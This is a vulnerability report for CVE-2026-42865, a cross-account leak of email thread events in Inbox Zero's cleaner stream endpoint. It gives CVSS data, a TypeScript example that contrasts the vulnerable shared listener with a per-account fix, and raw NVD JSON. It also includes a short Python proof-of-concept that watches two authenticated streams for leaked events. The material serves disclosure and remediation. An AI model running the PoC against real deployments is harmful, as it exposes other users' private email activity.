Security Vulnerability Report
CVE-2026-42865 CVSS 4.3 MEDIUM

Published: 2026-05-11 18:16:37
Last Modified: 2026-05-21 18:03:57

Description

Inbox Zero is an AI personal assistant for email. Prior to 2.29.3, the cleaner email stream endpoint used a shared Redis subscription listener, which could deliver thread events for one authenticated account to another authenticated account using the cleaner feature at the same time. This vulnerability is fixed in 2.29.3.
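The failure the description names is a subscription shared by every connected client, with no per-account scoping on the way out to the stream. The TypeScript below is an added example (not Inbox Zero's code and not the upstream patch; the project's actual stream and Redis code may differ) that contrasts that shape with a per-account subscription. Redis is replaced by a small in-memory pub/sub stand-in so the block runs offline; the `cleaner:<accountId>` channel naming, the `ThreadEvent` shape and the account names are assumptions made for the example.

```typescript
// Added illustration for CVE-2026-42865, not Inbox Zero's code. FakeRedisPubSub
// stands in for a Redis subscriber connection so this runs offline; the
// channel naming ("cleaner:<accountId>") and the ThreadEvent shape are
// assumptions chosen for the example.

type Listener = (channel: string, message: string) => void;

class FakeRedisPubSub {
  private exact = new Map<string, Set<Listener>>();
  private patterns: { prefix: string; listener: Listener }[] = [];

  // SUBSCRIBE channel; returns an unsubscribe function.
  subscribe(channel: string, listener: Listener): () => void {
    const set = this.exact.get(channel) ?? new Set<Listener>();
    this.exact.set(channel, set);
    set.add(listener);
    return () => {
      set.delete(listener);
    };
  }

  // PSUBSCRIBE prefix*; only a trailing wildcard is modelled.
  psubscribe(pattern: string, listener: Listener): () => void {
    const entry = { prefix: pattern.replace(/\*$/, ""), listener };
    this.patterns.push(entry);
    return () => {
      this.patterns = this.patterns.filter((p) => p !== entry);
    };
  }

  // PUBLISH channel message; returns how many listeners received it.
  publish(channel: string, message: string): number {
    let delivered = 0;
    this.exact.get(channel)?.forEach((l) => {
      l(channel, message);
      delivered++;
    });
    this.patterns.forEach((p) => {
      if (channel.startsWith(p.prefix)) {
        p.listener(channel, message);
        delivered++;
      }
    });
    return delivered;
  }
}

interface ThreadEvent {
  accountId: string;
  threadId: string;
  action: string;
}
type Write = (event: ThreadEvent) => void;
// Opens a cleaner stream for one account; returns a close function.
type OpenStream = (accountId: string, write: Write) => () => void;

const cleanerChannel = (accountId: string): string => `cleaner:${accountId}`;

// VULNERABLE shape: one process-wide listener and one shared set of stream
// writers. Every event the listener receives is fanned out to every open
// stream, so account B's client sees account A's thread events.
function makeSharedStreamOpener(bus: FakeRedisPubSub): OpenStream {
  const writers = new Set<Write>();
  let subscribed = false;
  return (_accountId, write) => {
    if (!subscribed) {
      bus.psubscribe("cleaner:*", (_channel, message) => {
        const event = JSON.parse(message) as ThreadEvent;
        writers.forEach((w) => w(event));
      });
      subscribed = true;
    }
    writers.add(write);
    return () => {
      writers.delete(write);
    };
  };
}

// FIXED shape: each stream subscribes only to its own account's channel and,
// as defence in depth, checks the accountId carried in the payload before
// writing to the client. Unsubscribing on close keeps listeners from piling up.
function makePerAccountStreamOpener(bus: FakeRedisPubSub): OpenStream {
  return (accountId, write) => {
    const channel = cleanerChannel(accountId);
    return bus.subscribe(channel, (ch, message) => {
      const event = JSON.parse(message) as ThreadEvent;
      if (ch !== channel || event.accountId !== accountId) return;
      write(event);
    });
  };
}

// Two accounts hold streams open at once; only alice's cleaner publishes.
// Returns the events each account's client received (constructed sample data).
function simulate(makeOpener: (bus: FakeRedisPubSub) => OpenStream): Record<string, ThreadEvent[]> {
  const bus = new FakeRedisPubSub();
  const open = makeOpener(bus);
  const seen: Record<string, ThreadEvent[]> = { alice: [], bob: [] };
  const closeAlice = open("alice", (e) => seen.alice.push(e));
  const closeBob = open("bob", (e) => seen.bob.push(e));
  const event: ThreadEvent = { accountId: "alice", threadId: "t-123", action: "archived" };
  bus.publish(cleanerChannel("alice"), JSON.stringify(event));
  closeAlice();
  closeBob();
  return seen;
}

const leaked = simulate(makeSharedStreamOpener);
const isolated = simulate(makePerAccountStreamOpener);
console.log("shared listener, bob saw:", leaked.bob); // alice's event leaks to bob
console.log("per-account listener, bob saw:", isolated.bob); // []
```

The decisive difference is where the authenticated account identifier enters the subscription. Scoping the channel (or the subscriber itself) to the requesting account is the fix the description implies; the payload check is defence in depth against a misnamed channel, and the returned close function matters because a stream that never unsubscribes keeps receiving events after the client is gone.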

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Secondary CVSS 4.0 (GitHub)
2.3 LOW, vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N (AT:P reflects that another account must be using the cleaner feature at the same time)
Weakness
CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)

Configurations (Affected Products)

cpe:2.3:a:getinboxzero:inbox_zero:*:*:*:*:*:*:*:* - VULNERABLE
Inbox Zero < 2.29.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import asyncio
import websockets

# Proof of Concept for CVE-2026-42865
# This script simulates connecting to the vulnerable stream endpoint.
# Due to the shared Redis subscription listener, data leakage occurs
# when multiple authenticated users interact with the cleaner feature simultaneously.
#
# The WebSocket transport, URL path and bearer-token scheme below are the PoC's
# assumptions; the advisory only states that the endpoint streams cleaner thread events.


async def victim_stream_listener(stream_url, auth_token):
    headers = {"Authorization": f"Bearer {auth_token}"}
    # Newer releases of the `websockets` package renamed the `extra_headers`
    # keyword to `additional_headers`; adjust if connect() rejects it.
    async with websockets.connect(stream_url, extra_headers=headers) as websocket:
        print(f"[*] Connected to stream as {auth_token[:10]}...")
        while True:
            try:
                message = await websocket.recv()
                # In the vulnerable version, this message might contain
                # thread events belonging to a different user.
                print(f"[!] Received Event: {message}")
            except Exception as e:
                print(f"Error: {e}")
                break


async def main(target_url, token_a, token_b):
    # Hold two streams open at once under different user tokens.
    await asyncio.gather(
        victim_stream_listener(target_url, token_a),
        victim_stream_listener(target_url, token_b),
    )


# Usage:
# Open two connections with different user tokens, trigger the 'cleaner'
# action on one account, and watch for that account's thread events
# appearing in the other connection's stream.
# TARGET_URL = "wss://inbox-zero-app.com/api/stream/cleaner"
# asyncio.run(main(TARGET_URL, "USER_A_TOKEN", "USER_B_TOKEN"))

References

https://github.com/elie222/inbox-zero/security/advisories/GHSA-f3gp-v7cj-2569 (Vendor Advisory, Patch)
https://github.com/elie222/inbox-zero/commit/02341923b5460ce9630c4681a9b6461ba466688a (Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42865", "sourceIdentifier": "[email protected]", "published": "2026-05-11T18:16:36.683", "lastModified": "2026-05-21T18:03:57.447", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inbox Zero is an AI personal assistant for email. Prior to 2.29.3, the cleaner email stream endpoint used a shared Redis subscription listener, which could deliver thread events for one authenticated account to another authenticated account using the cleaner feature at the same time. This vulnerability is fixed in 2.29.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getinboxzero:inbox_zero:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.29.3", "matchCriteriaId": "96735CCB-CCC9-487F-A5F4-EC379B6CC9D5"}]}]}], "references": [{"url": "https://github.com/elie222/inbox-zero/commit/02341923b5460ce9630c4681a9b6461ba466688a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/elie222/inbox-zero/security/advisories/GHSA-f3gp-v7cj-2569", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}